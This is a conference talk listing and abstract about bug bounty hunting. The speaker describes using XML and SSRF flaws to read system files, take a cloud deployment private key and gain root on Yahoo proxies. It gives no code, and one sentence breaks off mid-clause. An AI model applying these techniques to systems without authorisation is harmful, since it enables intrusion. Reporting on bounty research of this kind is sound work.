Presentations - Hunting for Top Bounties

  • Location: Security Dome
  • Speaker: Nicolas Grégoire
  • Date and time: 10. October 2014. 15:20 - 16:05

After one of these stupid bets, I had to look at bug bounty programmes.

first tried to apply a typical OWASP Top 10 methodology during the
Deutsche Telekom programme. Not very efficient... So I decided to
participate in other programmes with a focus on two narrow fields, XML and
SSRF. As expected, few people had a look at this area. As a result, I
totally pwned Prezi and Yahoo.

For both of them, I was quickly able to read non-privileged files
like /etc/passwd. I later accessed the private key of Prezi's cloud
deployment system (using a EC2/OpenStack trick) and got root privileges
on every outbound Yahoo proxy (with a vulnerability previously closed as

Big compromises implying big rewards, I earned the top rewards from both
programs. Around 25k$ in a few days, for pwning production networks,
that's a hobby that most sane people should enjoy!